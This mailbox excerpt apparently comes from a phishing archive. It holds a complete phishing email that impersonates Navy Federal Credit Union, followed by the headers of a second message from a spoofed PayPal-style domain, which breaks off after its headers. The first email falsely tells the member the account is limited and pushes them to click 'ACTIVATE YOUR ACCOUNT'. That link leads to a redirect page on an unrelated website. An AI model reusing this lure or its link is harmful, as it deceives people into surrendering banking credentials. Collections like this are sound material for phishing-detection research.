From: "Navy Federal Credit Union" <navyfcui@sccu4u.com>
Date: Tue, 10 Nov 2015 07:10:20 -0500
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 243

You will not see this in a MIME-aware mail reader.
--===============0678447156==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear NFCU Member

 We are contacting you to remind you that our Account
Review Team identified that your account has been
limited.
In accordance with NFCU Online Banking User Agreement
and to ensure that your account has not been accessed
from
fraudulent locations, access to your account has been
limited.

Your account access will remain limited until this
issue has been resolved.
Please log in your account by clicking on the link below

ACTIVATE YOUR ACCOUNT


Thank you for being one of our Member

Best Regards
NAVY FEDERAL CREDIT UNION


--===============0678447156==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<div id=3D"yui_3_16_0_1_1447143810447_10650" dir=3D"ltr"><div id=3D"yui_3_1=
6_0_1_1447143810447_10649"><div id=3D"yui_3_16_0_1_1447143810447_10648"><fo=
nt id=3D"yui_3_16_0_1_1447143810447_10665" size=3D"2">Dear NFCU Member<br><=
br>	We are contacting you to remind you that our Account<br>Review Team ide=
ntified that your account has been<br>limited.<br>In accordance with NFCU O=
nline Banking User Agreement<br>and to ensure that your account has not bee=
n accessed<br>from<br>fraudulent locations, access to your account has been=
<br>limited.<br><br>Your account access will remain limited until this<br>i=
ssue has been resolved.<br>Please log in your account by clicking on the li=
nk below<br><br></font></div><font id=3D"yui_3_16_0_1_1447143810447_10671" =
size=3D"2"><a id=3D"yui_3_16_0_1_1447143810447_10670" rel=3D"nofollow" targ=
et=3D"_blank" href=3D"http://www.joburgmarket.co.za/resources/colorbox/3/im=
ages/redirect.htm">ACTIVATE YOUR ACCOUNT</a><br><br><br></font></div><div i=
d=3D"yui_3_16_0_1_1447143810447_10673"><font id=3D"yui_3_16_0_1_14471438104=
47_10672" size=3D"2">Thank you for being one of our Member<br><br></font></=
div><div id=3D"yui_3_16_0_1_1447143810447_10674"><font size=3D"2">Best Rega=
rds<br></font></div><div id=3D"yui_3_16_0_1_1447143810447_10677"><font id=
=3D"yui_3_16_0_1_1447143810447_10676" size=3D"2"><b id=3D"yui_3_16_0_1_1447=
143810447_10675">NAVY FEDERAL CREDIT UNION</b><br></font></div><font size=
=3D"2"><span class=3D"yiv4941820752"></span></font><div><font size=3D"2"><b=
r></font></div></div>
--===============0678447156==--

From jose@monkey.org Tue Nov 10 22:37:38 2015 +0000
Return-Path: e.paypal@resolution-accesss.com
Delivered-To: jose@monkey.org
X-FDA: 70840154196.15.chalk13_85b403378e06
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 26,1,0,241b28ed874b077d,d41d8cd98f00b204,e.paypal@resolution-accesss.com,:,RULES_HIT:1:41:46:72:150:152:355:379:582:962:967:969:973:978:983:988:989:1152:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1394:1395:1431:1433:1434:1437:1516:1517:1543:1560:1571:1575:1588:1589:1594:1676:1685:1711:1714:1730:1747:1777:1792:1803:2198:2199:2393:2525:2527:2560:2563:2682:2685:2693:2859:2890:2892:2901:2909:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3585:3586:3867:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4605:5007:6117:6119:6238:6261:6650:7809:7903:8518:8603:8957:9025:9121:9411:9908:10004:10049:10346:11473:11657:11658:11914:11984:12043:12114:12438:12521:12555:13095:13139:13237:13255:14093:14096:14516:14659:21080:21094:30001:30016:30022:30038:30054:30055:30070:30075,0,RBL:104.47.124.85:@resolution-accesss.com:.lbl8.mailshell.net-62.2.255.100 64.100.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:
X-HE-Tag: chalk13_85b403378e06
X-Filterd-Recvd-Size: 10680
Received: from APC01-HK2-obe.outbound.protection.outlook.com (mail-hk2apc01on0085.outbound.protection.outlook.com [104.47.124.85])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 10 Nov 2015 22:37:37 +0000 (UTC)
Authentication-Results: spf=none (sender IP is )
 smtp.mailfrom=e.paypal@resolution-accesss.com; 
Received: from aganim32 (104.171.123.218) by
 HK2PR01MB0739.apcprd01.prod.exchangelabs.com (10.165.54.141) with Microsoft
 SMTP Server (TLS) id 15.1.318.15; Tue, 10 Nov 2015 22:37:33 +0000
